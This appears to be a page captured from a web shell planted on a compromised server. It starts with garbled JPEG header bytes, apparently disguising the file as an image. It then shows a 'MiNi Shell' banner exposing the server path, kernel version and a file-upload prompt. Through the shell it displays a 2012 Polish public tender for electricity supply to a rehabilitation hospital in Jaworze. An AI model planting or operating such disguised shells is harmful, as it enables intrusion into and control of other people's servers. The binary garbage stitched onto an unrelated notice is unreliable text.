JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120320/85524-N-2012.html

<p class="kh_header"><b>Jaworze: sprzedaż energii elektrycznej do obiektów Beskidzkiego Zespołu Leczniczo- Rehabilitacyjnego Szpitala Opieki Długoterminowej  w Jaworzu.</b><br>
<b>Numer ogłoszenia: 85524 - 2012; data zamieszczenia: 20.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Beskidzki Zespół Leczniczo-Rehabilitacyjny Szpital Opieki Długoterminowej , ul. Słoneczna 83, 43-384 Jaworze, woj. śląskie, tel. 033 8172166 (-67), faks 033 8173463.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rehabilitacja-jaworze.com.pl ;                                bip.silesia-region.pl/bzlrjaworze</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sprzedaż energii elektrycznej do obiektów Beskidzkiego Zespołu Leczniczo- Rehabilitacyjnego Szpitala Opieki Długoterminowej  w Jaworzu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia powinien spełniać parametry techniczne zgodnie z zapisami ustawy Prawo energetyczne oraz rozporządzeniami wykonawczymi do tej ustawy i Polskimi Normami. 
2.	Sprzedaż energii elektrycznej odbywać się będzie do n/w stacji transformatorowych / punktów poboru energii elektrycznej: 
a)	Oddział Leczniczo-Rehabilitacyjny dla Dzieci i Młodzieży ul. Wapienicka 142 w Jaworzu dostawy energii elektrycznej do stacji transformatorowej / punkt poboru energii elektryczne tj. zaciski podstaw bezpiecznikowych w ZK nr 2671 St. tr. nr 1-S10823 Jaworze. Grupa przyłączeniowa IV. Moc przyłączeniowa Pp = 100 kW,  moc umowna Pu= 50 kW, tg0 =0,4, minimalną moc umowną wynikającą z 20% prądu znamionowego przekładników prądowych przy cos=0,93, Pumin= 19kW, wielkość zabezpieczenia przedlicznikowego 160A, rodzaj przyłącza - kablowe, napięcie kV = 0,4, (grupa taryfowa C-22A), mnożna układu 30, zapotrzebowanie energii elektrycznej  ok. strefa szczytowa 80 000, pozaszczytowa 70 000.
Układ pomiarowo-rozliczeniowy przekładniki prądowe 150/5A stanowią własność odbiorcy, licznik energii elektrycznej stanowi własność operatora systemu dystrybucyjnego i zabudowany jest w szafce pomiarowej
b)	Oddział Leczniczo-Rehabilitacyjny dla Dorosłych ul. Słoneczna 83 w Jaworzu dostawy energii elektrycznej do stacji transformatorowej / punkt poboru energii elektrycznej tj. na odpływie kabli zasilających z podstaw bezpiecznikowych w rozdzielni nn st. tr. Nr 1-S10823 Jaworze. Grupa przyłączeniowa IV z mocą przyłączeniową Pp = 100 kW,  moc umowna Pu  = 60 kW, minimalną moc umowną wynikającą z 20% prądu znamionowego przekładników prądowych przy cos=0,93, Pumin= 26kW, tg0 =0,4; wielkość zabezpieczenia przedlicznikowego 160A, rodzaj przyłącza - kablowe, napięcie kV = 0,4, (grupa taryfowa C-21), mnożna układu 40, zapotrzebowanie energii elektrycznej  ok. 230 000 kWh - rocznie.
Układ pomiarowo-rozliczeniowy przekładniki prądowe 200/5 A stanowią własność odbiorcy, licznik energii zabudowany w szafce pomiarowej stanowi własność operatora systemu dystrybucyjnego
c)	ul. Podgórska w Jaworzu dostawy energii elektrycznej do stacji transformatorowej / punkt poboru energii elektryczne tj. zaciski prądowe przewodów przyłącza przy konstrukcji wsporczej na ścianie budynku, na wyjściu w kierunku instalacji przyłączonego podmiotu; grupa przyłączeniowa V z mocą przyłączeniową Pp = 15 kW, mnożna układu 1,  moc umowna = 15 kW oraz tg0 =0,4 przy prądzie znamionowym zabezpieczenia przedlicznikowego w torze prądowym I = 25A, (dotychczasowa  grupa taryfowa C-11), zapotrzebowanie energii elektrycznej  ok. 9 000 kWh - rocznie.
Układ pomiarowo-rozliczeniowy 3-fazowy zainstalowana jest szafka pomiarowa na zewnątrz budynku
d)	ul. Wapienicka 167 w Jaworzu dostawy energii elektrycznej do stacji transformatorowej / punkt poboru energii elektryczne tj. zaciski prądowe przewodów przyłącza przy konstrukcji wsporczej na ścianie budynku na wyjściu w kierunku odbiorcy, grupa przyłączeniowa V z mocą przyłączeniową Pp = 10,3 kW, moc umowna Pu  = 10,3 kW oraz tg0 =0,4 przy prądzie znamionowym zabezpieczenia przedlicznikowego w torze prądowym I=25A, (dotychczasowa  grupa taryfowa C-11), zapotrzebowanie energii elektrycznej  ok. 500 kWh - rocznie. Mnożna układu = 1.
Układ pomiarowo-rozliczeniowy 3-fazowy zainstalowany jest wewnątrz.

3.	Realizacja przedmiotu zamówienia odbywać się ma na warunkach określonych przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (tekst jednolity Dz. U. z 2006 r. Nr 89 poz. 625 z późn. zm.), kodeksu cywilnego oraz z przepisów wykonawczych wydanych na ich podstawie.
4.	Rozliczenie za sprzedaż energii elektrycznej odbywać się będzie na podstawie faktycznego zużycia energii wg cen i stawek opłat wynikających z oferty cenowej Wykonawcy.
5.	Cena obejmuje wszystkie czynności Wykonawcy niezbędne do uzyskania efektu finalnego. Wymaganym jest by wszystkie koszty i składniki związane z wykonaniem zamówienia, uwzględniające cały zakres przedmiotu zamówienia, zawarte były w cenie oferty.
6.	Cena podana w ofercie to wynagrodzenie Wykonawcy za sprzedaż energii elektrycznej wg odpowiadających jej składników cenowych, które należy ująć w Formularzu Ofertowym - Załącznik nr 1 do SIWZ.
7.	Podana w ten sposób cena będzie obowiązywać niezmiennie przez czas obowiązywania umowy. Rozliczenia między Zamawiającym a Wykonawcą dokonywane będą w PLN. Wykonawca będzie zobowiązany do zapewnienia nieprzerwanej dostawy energii elektrycznej, także w sytuacji gdyby następowała zmiana dotychczasowego Sprzedawcy energii,  
8.	Obowiązkiem Wykonawcy jest przeprowadzenie wizji lokalnej w celu sprawdzenia gotowości stacji transformatorowych / punktów poboru energii elektrycznej do zmiany dostawcy energii elektrycznej,
9.	Wykonawca wypowie dotychczasowe umowy sprzedaży i świadczenia usług dystrybucji (umowy kompleksowe) Zamawiającego, zawiązane z dotychczasowym Dostawcą energii elektrycznej, oraz dokona zgłoszenia nowej umowy sprzedaży energii elektrycznej do lokalnego Operatora Systemu Dystrybucyjnego, świadczącego usługi dystrybucji na rzecz Zamawiającego. Czynności opisane powyżej Wykonawca zrealizuje na podstawie upoważnienia wystawionego przez Zamawiającego, obejmującego niezbędny zakres czynności wymaganych w w/w procedurze zmiany sprzedawcy energii elektrycznej. Dokumentację procedury zmiany sprzedawcy Wykonawca sporządzi na podstawie kompletnych danych Zamawiającego, przekazanych przez Zamawiającego w dniu podpisania umowy, w postaci cyfrowej (MS Excel, word) drogą elektroniczną na jego adres e-mail, dotyczących każdego punkcie poboru energii elektrycznej przypisanego do Zamawiającego i wymienionego w niniejszej SIWZ.
10.	Wykonawca zobowiązany jest do zapewnienia ciągłych dostaw,
11.	Obniżenie przez Wykonawcę cen jednostkowych może nastąpić w każdym czasie i nie wymaga zgody Zamawiającego ani sporządzania w tym zakresie aneksu do umowy.
12.	Stosownie do art. 34 ust. 5 ustawy PZP, Zamawiający zastrzega sobie prawo opcji w postaci możliwości zamówienia dodatkowo do 20% dostaw, stanowiących przedmiot zamówienia w cenach jednostkowych określonych w ofercie Wykonawcy, na warunkach i w terminach określonych istotnych postanowieniach umowy, a Wykonawca zobowiązuje się uprawnienie to zrealizować w razie skorzystania z niego przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.30.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy Wykonawca biorący udział w postępowaniu ma obowiązek wpłacenia wadium w wysokości: 3 000,00 zł (słownie: trzy tysiące zł 00/100); 

2.	Wadium należy złożyć przed upływem składania ofert w formie przewidzianej w ustawie:
a)	pieniądzu
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, ze poręczenie kasy jest zawsze poręczeniem pieniężnym.
c)	gwarancjach bankowych 
d)	gwarancjach ubezpieczeniowych
e)	poręczeniach udzielanych przez podmioty, o których mowa w art.6 b  ust. 5 pkt 2  ustawy z dnia 9 listopada 2000r. o Utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( tekst jednolity Dz. U. z 2007r. nr 42, poz.275 ze zmianami )
3.	Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego    45 1130 1091 0012 1150 8020 0002
4.	Potwierdzenie wniesienia wadium Wykonawca dołącza do składanej oferty. Kopię dokumentu potwierdzającego wniesienie wadium należy załączyć do oferty, zaś oryginał dokumentu (gwarancja bankowa, ubezpieczeniowa, itd.) należy złożyć w oddzielnej kopercie wraz z ofertą.
5.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy zgodnie z art. 46 ust. 2 ustawy PZP.
6.	Wadium wniesione w pieniądzu zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
7.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złożył dokumentów, o których mowa w art. 25 ust. 1 ustawy PZP, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
-	nie wniósł zabezpieczenia należytego wykonania umowy;
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego wymogu Zamawiający uzna dołączone do oferty:

a)	Oryginał lub kopia koncesji na prowadzenie działalności gospodarczej w zakresie obrotu energią elektryczną wydanej przez Prezesa Urzędu Regulacji Energetyki. Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca załączy do oferty oryginał lub kopię koncesji.      
b)	oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP, złożone na druku, stanowiącym załącznik nr 3 do SIWZ
c)	Oświadczenie Wykonawcy, że posiada lub zawrze w okresie realizacji przedmiotu zamówienia, dotycząca niniejszego postępowania generalną umowę dystrybucji energii elektrycznej z lokalnym operatorem systemu dystrybucyjnego, który świadczy usługi dystrybucji na rzecz Zamawiającego (załącznik nr 5 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego wymogu Zamawiający uzna dołączone do oferty:
a)	oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP, złożone na druku, stanowiącym załącznik nr 3 do SIWZ
b)	Oświadczenie, że realizacja przedmiotu zamówienia odbywać się będzie na warunkach określonych przepisami ustawy z dnia 10.04.1997 r. Prawo energetyczne (tekst jednolity Dz. U. z 2006 r. Nr 89 poz. 625 z późn. zm.), kodeksu cywilnego oraz z przepisami wykonawczymi wydanymi na ich podstawie (załącznik nr 2 do SIWZ)
c)	wykaz dostaw, wykonanych w ciągu ostatnich 3 lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia wszczęcia postępowania o udzielenie zamówienia, z podaniem nazwy i danych zleceniodawcy, zakresu zamówienia, terminów wykonania oraz wartości, zawierający co najmniej dwa zadania o wartości jednostkowej każdego z nich na  kwotę min. 100 000,00 zł brutto (słownie: sto tysięcy 00/100 zł), polegających na wykonaniu dostaw odpowiadającym swoim zakresem  i rodzajem dostawom stanowiącym przedmiot zamówienia i potwierdzonych stosownym dokumentem (referencje lub opinia) uprzedniego zleceniodawcy (załącznik nr 6 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego wymogu Zamawiający uzna dołączone do oferty:
a)	oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP, złożone na druku, stanowiącym załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego wymogu Zamawiający uzna dołączone do oferty:
a)	oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP, złożone na druku, stanowiącym załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego wymogu Zamawiający uzna dołączone do oferty:

a)	opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia  na kwotę co najmniej: 100 000,00 zł brutto (słownie sto tysięcy 00/100 zł),
b)	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą wysokość środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert w wysokości nie mniejszej niż: 100 000,00 zł brutto (słownie: sto tysięcy 00/100 zł),
c)	oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy PZP, złożone na druku, stanowiącym załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza zmianę umowy w następujących przypadkach:
1)	wystąpi siła wyższa uniemożliwiająca Wykonawcy wykonanie przedmiotu zamówienia. W takim przypadku strony mogą przesunąć termin zakończenia wykonania niniejszej umowy o czas w jakim siła wyższa uniemożliwiała wykonanie obowiązków Stron,
2)	zmian wynikających z przekształceń własnościowych,
3)	zmian organizacyjno-technicznych,
4)	zmiany adresu
5)	wystąpi konieczność zmiany osób koordynujących (osób odpowiedzialnych za realizację umowy ze strony Wykonawcy lub ze strony Zamawiającego).
6)	wystąpi konieczność wprowadzenia innych zmian, które są niezbędne do wykonania umowy, a których nie dało się przewidzieć w chwili zawarcia umowy oraz nie są zmianami istotnych postanowień umowy,
7)	wystąpi zmiana stawek celnych lub podatkowych powodująca, że wykonanie zobowiązania wiąże się z rażąco wysokimi kosztami, wówczas dopuszczalna jest zmiana wynagrodzenia,
8)	wystąpi zmiana przepisów prawa, powodująca, że wykonanie zobowiązania wiąże się z rażąco wysokimi kosztami, wówczas dopuszczalna jest zmiana wynagrodzenia.
